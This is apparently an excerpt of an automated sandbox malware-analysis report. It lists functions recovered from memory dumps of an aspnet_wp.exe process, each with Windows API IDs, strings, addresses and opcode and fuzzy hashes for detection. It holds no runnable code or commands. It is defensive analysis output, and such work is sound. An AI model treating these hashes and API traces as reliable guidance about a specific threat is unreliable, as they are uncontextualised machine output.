                                                                                                                                                                                            • Source File: 0000000C.00000002.3897320165.000002109C390000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002109C390000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c390000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                                                            • Instruction ID: cb4053f28ff79212fcf8ecdc98f16ffd4aacfd774d87d0dc3d5e569af7671814
                                                                                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 20E1AE72A04748CAEB609B65D6D83DD77A0F7A5B98F00C105EE8D47B96CBB4C6D1C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3CA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                                                            • Instruction ID: e1f3176b73b7f1783def9259b449992ec213e37500c9a96582015c6ccc233224
                                                                                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                                                            • Instruction Fuzzy Hash: DDE1AC72A54B48CAEB209F2596D93DD77A0F765B98F00C105EEC967B8ACB74C6D1CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3CF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                                                            • Instruction ID: 0868b54845a54cb7a846209012e4bdf2d870757c70f2bee707063d33dd34642b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                                                                                            • Instruction Fuzzy Hash: 81413932B51A04D1FB11CB16AAA83D923A1BB68FE0F05C1258D4EA7786DF7CC6C58304
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                            • Instruction ID: d8de60cfc2ab7c194a7623a09a076248dbf16e25d94f3d1df51e121e49965efa
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                            • Instruction Fuzzy Hash: F7417E72614B88C6E760CF61E59839E77A1F388F88F04C129DA8A17759DF7CC589CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3CD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000002109C3CC7DE,?,?,?,?,?,?,?,?,000002109C3CCF9D,?,?,00000001), ref: 000002109C3CD087
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002109C3CC7DE,?,?,?,?,?,?,?,?,000002109C3CCF9D,?,?,00000001), ref: 000002109C3CD0A6
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002109C3CC7DE,?,?,?,?,?,?,?,?,000002109C3CCF9D,?,?,00000001), ref: 000002109C3CD0CE
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002109C3CC7DE,?,?,?,?,?,?,?,?,000002109C3CCF9D,?,?,00000001), ref: 000002109C3CD0DF
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002109C3CC7DE,?,?,?,?,?,?,?,?,000002109C3CCF9D,?,?,00000001), ref: 000002109C3CD0F0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                            • String ID: 1%$Y%
                                                                                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                                                            • Instruction ID: 1efdf8a953664c4269c05b5355601633fef5c05528188273081419f834ae412d
                                                                                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 96110030E8424CC2FA6457255BF93ED62415B64FE0F14C225ECA9676DBDAA886919600
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction ID: 1e56cfd22932568ab6c6d98db742ad0225d54bb37f47e2fef59342e0c9305c25
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction Fuzzy Hash: 24819E31E8060DC6FB50AF2596F93ED62A0AB76F80F14C4159E85637A7DBB8C7D58700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                                                            • Instruction ID: 013cb91cc2d4fdad9268953bcff396dbde7692589b34785347f7c5af4f3d6962
                                                                                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B312D31B42744D1EF11DB12A6A87D82394B779FA0F5AC525DD6E17392DFB8C2C58300
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3D3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                                                            • Instruction ID: 6b0802989ab5ae440afca8fe6acf68dfa1cf69143f78afe84eb3dae714077dca
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D11BC31710B45C3E7508B56E9A835973B0F798FE4F04C214EA1A477D6CFB8C6548740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                                                            • String ID: dialer
                                                                                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                                                            • Instruction ID: 981d4fa4a91b39c8285b2f815d8a6223210dfa105cee9ecffacefcf1c438cdfa
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                                                            • Instruction Fuzzy Hash: 44319E32B01B59C2E750CF16A6A87E967A0BB64F80F08C020DE8917B57EFB5C6E18740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C14A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 80memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
                                                                                                                                                                                            • API String ID: 3168794593-572361757
                                                                                                                                                                                            • Opcode ID: 5f1dcf0d6982f64b78ee420bc41fcee6693c0fdf65c097574d0a291fc3cf39dd
                                                                                                                                                                                            • Instruction ID: 697a2a495f770095527f7e417abdaa21c96b2e01b10bf04ccbeca487eec47aef
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f1dcf0d6982f64b78ee420bc41fcee6693c0fdf65c097574d0a291fc3cf39dd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0431B7B7D09EC8DAF351CB759EB92897F70F7A5F40F09C415DA5603287D96486818780
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3CCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                                                            • Instruction ID: d2fc228ec9ef7f732632d0725a39592b621edcbe3a9c8285519075b1f9931615
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                                                            • Instruction Fuzzy Hash: A3116F30A8024CC2FA24973567FD3ED62515BB8FA0F10C714ECB6676D7DAE886918700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 517849248-0
                                                                                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                                                            • Instruction ID: 88979637829c5f36ad83fb4bbb91d197296b070bb64ea00120c9aa1fedd5fc57
                                                                                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 13016D31B00A48C2EB50DB52A5AC39963A1F798FC0F88C435DE9A53796DF7CC689C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 449555515-0
                                                                                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                                                            • Instruction ID: 09471aa4dabbf490bf276f1b36b2de3e494ebcaf60028a48220a61ffdc6c5d69
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 45012575A15B48C2EB249B12E9AD3D973B0BB69F85F04C424CD5A07796EFBDC2948700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C8FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                            • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                                                            • Instruction ID: 2df408b0301d5279468e9388afdfe4c22290a8c93b27eeca5ac00d928e7b22f4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                                                            • Instruction Fuzzy Hash: DB51D432A41304CADB14CB15E99DB9D3795F365F88F12C410DE965378ADBB5CAC1C784
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                            • String ID: \\?\
                                                                                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                                                            • Instruction ID: 28e22d6b1873d5aa684331fd1d25c733003392fab2425907d64ceb073dafdc83
                                                                                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 54F03672B04645D2E7608B11EAE87996770F758F88F84C020DA8A46595DAACC7CDCB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CombinePath
                                                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                                                            • Instruction ID: 5303737d532be7aee815c9ea91e4066ed0800bbb3d6218468f84fc2c8db0190e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                                                            • Instruction Fuzzy Hash: F3F05E31A04B98C2EB408B12BAA81996260AB5CFC0F08C420EE5707B6ADF6CC6858700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3CBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                                                            • Instruction ID: 48922e9560d5d63a7360639c54667b96fbba87616e83a6c2e1628d04e8883424
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF06271A11608C1EB108B24E9AC3D96330EBA5F65F54C619DA6B451EADFACC6C98340
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                            • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                                                            • Instruction ID: 4db37219d988b62cb7e76c9bccd3f3d811ab53cdd07be3196be0346ad1dd1133
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A610A36958B48C6E760CB15E5A835E77A0F398B84F508115EACD53BAACBBCC690DF00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3A3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3897320165.000002109C390000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002109C390000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c390000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction ID: a7e7a644ef88e892ceac81f5a1759d728e127f17bbc03a8376c3b3a42f372cb0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction Fuzzy Hash: 84119472E50B1D91FAD4152CE6FD3F931C0AB7DB74F48C628A9E6062D7CAA8CAE15500
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3D4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction ID: 68779fc11523026f97ea555d161d12a0f4b645b71e7cf82ade23cd5b2b11597c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                            • Instruction Fuzzy Hash: 00119432E10A98B1F7641568D7FE3E511506B78BF8F08C724A577066D78AA8CAC162A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C39F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3897320165.000002109C390000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002109C390000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c390000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
